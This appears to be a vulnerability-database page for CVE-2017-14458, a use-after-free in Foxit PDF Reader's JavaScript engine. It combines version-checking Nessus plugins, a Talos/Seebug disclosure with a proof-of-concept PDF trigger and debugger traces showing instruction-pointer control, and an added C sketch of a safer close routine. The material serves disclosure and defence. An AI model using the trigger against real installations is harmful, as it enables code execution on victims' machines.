CVE-2017-14458 - Use After Free vulnerability in Foxit PDF Reader 8.3.2.25013

CVSS 8.8 - HIGH
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH

Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Vulnerable Configurations

Part         Description   Count
Application  Foxit         1

Common Weakness Enumeration (CWE)

CWE-416: Use After Free

Nessus

  • NASL family: Windows
    NASL id: FOXIT_PHANTOM_8_3_6.NASL
    description: According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 119837
    published: 2018-12-21
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/119837
    title: Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(119837);
      script_version("1.3");
      script_cvs_date("Date: 2019/10/31 15:18:52");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3843",
        "CVE-2018-3850",
        "CVE-2018-3853",
        "CVE-2018-10302",
        "CVE-2018-10303"
      );
      script_bugtraq_id(103942, 103999);
    
      script_name(english:"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit PhantomPDF.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF toolkit installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its version, the Foxit PhantomPDF application (formally
    known as Phantom) installed on the remote Windows host is prior to
    8.3.6. It is, therefore, affected by multiple vulnerabilities.");
      # https://www.foxitsoftware.com/support/security-bulletins.php
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2f244c3e");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit PhantomPDF version 8.3.6 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-3853");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/21");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantom");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantompdf");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_phantom_installed.nasl");
      script_require_keys("installed_sw/FoxitPhantomPDF");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'FoxitPhantomPDF';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '8.0',
      'max_version' : '8.3.5.30351',
      'fixed_version' : '8.3.6'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL family: Windows
    NASL id: FOXIT_READER_9_1_0_5096.NASL
    description: The version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-04-30
    modified: 2018-04-27
    plugin id: 109399
    published: 2018-04-27
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/109399
    title: Foxit Reader < 9.1 Multiple Vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(109399);
      script_version("1.6");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/27");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3850",
        "CVE-2018-3853"
      );
      script_bugtraq_id(103942);
      script_xref(name:"ZDI", value:"ZDI-18-312");
      script_xref(name:"ZDI", value:"ZDI-18-313");
      script_xref(name:"ZDI", value:"ZDI-18-315");
      script_xref(name:"ZDI", value:"ZDI-18-329");
      script_xref(name:"ZDI", value:"ZDI-18-330");
      script_xref(name:"ZDI", value:"ZDI-18-331");
      script_xref(name:"ZDI", value:"ZDI-18-332");
      script_xref(name:"ZDI", value:"ZDI-18-335");
      script_xref(name:"ZDI", value:"ZDI-18-339");
      script_xref(name:"ZDI", value:"ZDI-18-340");
      script_xref(name:"ZDI", value:"ZDI-18-341");
      script_xref(name:"ZDI", value:"ZDI-18-342");
      script_xref(name:"ZDI", value:"ZDI-18-344");
      script_xref(name:"ZDI", value:"ZDI-18-345");
      script_xref(name:"ZDI", value:"ZDI-18-346");
      script_xref(name:"ZDI", value:"ZDI-18-348");
      script_xref(name:"ZDI", value:"ZDI-18-349");
      script_xref(name:"ZDI", value:"ZDI-18-350");
      script_xref(name:"ZDI", value:"ZDI-18-351");
      script_xref(name:"ZDI", value:"ZDI-18-352");
      script_xref(name:"ZDI", value:"ZDI-18-354");
      script_xref(name:"ZDI", value:"ZDI-18-358");
      script_xref(name:"ZDI", value:"ZDI-18-359");
    
      script_name(english:"Foxit Reader < 9.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit Reader.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF viewer installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Foxit Reader installed on the remote Windows host is
    prior to 9.1. It is, therefore, affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"see_also", value:"https://www.foxitsoftware.com/support/security-bulletins.php");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit Reader version 9.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-14458");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/27");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:foxit_reader");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_reader_installed.nasl");
      script_require_keys("installed_sw/Foxit Reader");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'Foxit Reader';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '9.0',
      'fixed_version' : '9.1.0.5096'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL family: Windows
    NASL id: FOXIT_PHANTOM_9_1_0_5096.NASL
    description: According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 109398
    published: 2018-04-27
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/109398
    title: Foxit PhantomPDF < 9.1 Multiple Vulnerabilities
  • NASL family: Windows
    NASL id: FOXIT_PHANTOM_9_1_0.NASL
    description: According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-04-30
    modified: 2018-12-21
    plugin id: 119838
    published: 2018-12-21
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/119838
    title: Foxit PhantomPDF < 9.1 Multiple Vulnerabilities

Seebug

bulletin family: exploit
description:

### Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

### Tested Versions

Foxit Software Foxit PDF Reader 8.3.2.25013.

### Product URLs

https://www.foxitsoftware.com/products/pdf-reader/

### CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

### CWE

CWE-416: Use After Free

### Details

Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.

When executing embedded JavaScript code, a document can be closed, which essentially frees a lot of used objects, but the JavaScript can continue to execute. Invoking a method which keeps a stale reference to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code.

This particular vulnerability lies in the this.search.query() method, which triggers a use-after-free condition when the following code is executed in a regular PDF document:

```
7 0 obj
<< >>
stream
this.closeDoc();
this.search.query( );
endstream
endobj
```

Opening this proof-of-concept PDF document in Foxit Reader with PageHeap enabled results in the following crash:

```
(498.14fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FoxitReader_Lib_Full.exe -
eax=00000000 ebx=21152ff8 ecx=107f0de8 edx=00000000 esi=1b630ff8 edi=037def5c
eip=01562a78 esp=037ded5c ebp=037dedb0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58:
01562a78 8b11            mov     edx,dword ptr [ecx]  ds:002b:107f0de8=????????
0:000> !heap -p -a ecx
    address 107f0de8 found in
    _DPH_HEAP_ROOT @ d4f1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                   107414e0:         107f0000             2000
    6bf4ab22 verifier!AVrfDebugPageHeapFree+0x000000c2
    77c158e8 ntdll!RtlDebugFreeHeap+0x0000003c
    77bc5bed ntdll!RtlpFreeHeap+0x0005616d
    77b6fa0d ntdll!RtlFreeHeap+0x000007cd
    0075bd5b FoxitReader_Lib_Full+0x005cbd5b
    002bb657 FoxitReader_Lib_Full+0x0012b657
    002be4d5 FoxitReader_Lib_Full+0x0012e4d5
    0046596c FoxitReader_Lib_Full+0x002d596c
    0046568f FoxitReader_Lib_Full+0x002d568f
    0047d114 FoxitReader_Lib_Full+0x002ed114
    005ca8e6 FoxitReader_Lib_Full+0x0043a8e6
    0045c7ad FoxitReader_Lib_Full+0x002cc7ad
    0045c4bf FoxitReader_Lib_Full+0x002cc4bf
    005c043e FoxitReader_Lib_Full+0x0043043e
    005ba7f6 FoxitReader_Lib_Full+0x0042a7f6
    005be7b7 FoxitReader_Lib_Full+0x0042e7b7
    005be846 FoxitReader_Lib_Full+0x0042e846
    751ee0bb USER32!_InternalCallWinProc+0x0000002b
    751f8849 USER32!InternalCallWinProc+0x00000020
    751fb145 USER32!UserCallWinProcCheckWow+0x000001be
    751e8503 USER32!DispatchClientMessage+0x000001b3
    751e8aa0 USER32!__fnDWORD+0x00000050
    77ba0bad ntdll!KiUserCallbackDispatcher+0x0000004d
    751db95b USER32!SendMessageW+0x0000005b
    00459022 FoxitReader_Lib_Full+0x002c9022
    005c0667 FoxitReader_Lib_Full+0x00430667
    005ba7f6 FoxitReader_Lib_Full+0x0042a7f6
    005be7b7 FoxitReader_Lib_Full+0x0042e7b7
    005be846 FoxitReader_Lib_Full+0x0042e846
    751ee0bb USER32!_InternalCallWinProc+0x0000002b
    751f8849 USER32!InternalCallWinProc+0x00000020
    751fb145 USER32!UserCallWinProcCheckWow+0x000001be
```

Analyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the next few instructions we can see the following:

```
0:000> u
FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58:
01562a78 8b11            mov     edx,dword ptr [ecx]
01562a7a 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
01562a7d 8b8254020000    mov     eax,dword ptr [edx+254h]
01562a83 ffd0            call    eax
```

We can observe from the above listing that the twice-dereferenced address from ecx, through edx+0x254, ends up in eax, which is then used as the argument to the call instruction. This makes this vulnerability easy to exploit, since we can control the contents of ecx. With a bit of memory layout control, and with PageHeap off, we can get full EIP control:

```
(2ac4.25e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FoxitReader_Lib_Full.exe -
eax=41414141 ebx=0c6d5a60 ecx=0c665a20 edx=0c6b3948 esi=0c6d5950 edi=044ff464
eip=41414141 esp=044ff260 ebp=044ff2b8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
41414141 ??              ???
0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
03aff0fc 01562a85 0x41414141
03aff158 01668d7f FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c65
03aff200 01668632 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6f5f
03aff2b4 005a1a57 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6812
03aff2ec 01425a6e FoxitReader_Lib_Full+0x411a57
03aff320 0141d876 FoxitReader_Lib_Full!CryptUIWizExport+0x473c4e
03aff388 0141fc23 FoxitReader_Lib_Full!CryptUIWizExport+0x46ba56
03aff398 1640a0d6 FoxitReader_Lib_Full!CryptUIWizExport+0x46de03
03aff3b8 16444b63 0x1640a0d6
```

Closing the document via JavaScript frees objects, but JavaScript continues to execute, and some stale references can cause a use after free, which is what happens in this case. Since the memory pointed at by ecx is freed, a careful heap manipulation can put it under attacker control, indirectly giving control over eax, leading to arbitrary code execution.

### Timeline

* 2017-12-12 - Vendor Disclosure
* 2017-12-12 - Discussion with vendor on issues
* 2018-01-29 - Vendor advised issue fixed in code scheduled for next release early April
* 2018-04-01 - Vendor pushed release to mid April
* 2018-04-19 - Vendor patch released
* 2018-04-19 - Public disclosure
id: SSV:97301
last seen: 2018-06-08
modified: 2018-05-17
published: 2018-05-17
reporter: Knownsec
title: Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability (CVE-2017-14458)
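Added here as an illustration, not code from Foxit, Talos or Seebug: a small C model of the stale-reference pattern the advisory describes (a document closed from script while a dependent object still holds a pointer into it), with the unsafe close next to a hardened close that severs the dependent's reference so a later query is refused instead of dereferencing freed memory. Every name in it (Doc, DocOps, Search, doc_open, close_doc_unsafe, close_doc_safe, search_query) is an assumption made for the example.

```c
/* Added example, not Foxit or Talos code: a minimal C model of the
 * closeDoc()/search.query() stale-reference bug described above, with the
 * unsafe close beside a hardened close that severs the dependent object's
 * back-pointer. All type and function names are hypothetical. */
#include <stdlib.h>
#include <string.h>
enum { QUERY_OK = 0, QUERY_ERR_CLOSED = -1 };

struct Doc;
typedef struct { int (*query)(struct Doc *); } DocOps;   /* models the vtable */
typedef struct Doc { const DocOps *ops; int page_count; } Doc;
typedef struct { Doc *owner; } Search;    /* dependent holding a back-pointer */
static int doc_query_impl(Doc *d) { return d->page_count; }
static const DocOps doc_ops = { doc_query_impl };

Doc *doc_open(int pages) {
    Doc *d = calloc(1, sizeof *d); if (!d) return NULL;
    d->ops = &doc_ops; d->page_count = pages;
    return d;
}

/* Unsafe pattern: the document is freed but s->owner still points at it, so
 * the next query reads ops out of freed memory (the mov edx,[ecx]; mov
 * eax,[edx+254h]; call eax sequence above). Not called: undefined behaviour. */
void close_doc_unsafe(Doc *d, Search *s) { (void)s; free(d); }

/* Hardened pattern: sever the dependent's reference and scrub the object
 * before the memory goes back to the allocator. */
void close_doc_safe(Doc *d, Search *s) {
    if (s && s->owner == d) s->owner = NULL;
    memset(d, 0, sizeof *d);              /* no valid ops pointer survives */
    free(d);
}

int search_query(Search *s, int *out) {
    if (!s->owner) return QUERY_ERR_CLOSED;   /* stale reference rejected */
    *out = s->owner->ops->query(s->owner);
    return QUERY_OK;
}

/* The closeDoc(); search.query() sequence run against the hardened close. */
int demo_closed_query_is_rejected(void) {
    Doc *d = doc_open(3);
    Search s = { d };
    int n = 0;
    int before = search_query(&s, &n);        /* QUERY_OK, n == 3 */
    close_doc_safe(d, &s);
    int after = search_query(&s, &n);         /* QUERY_ERR_CLOSED, n stays 3 */
    return before == QUERY_OK && n == 3 && after == QUERY_ERR_CLOSED;
}
```

In a real engine the same invalidation has to reach every object that captured a document pointer (search, forms, annotations), which is why a closed-document flag checked at each scripting entry point is the usual fix rather than per-object cleanup alone.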

Talos

id: TALOS-2017-0506
last seen: 2019-05-29
published: 2018-04-19
reporter: Talos Intelligence
source: http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506
title: Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability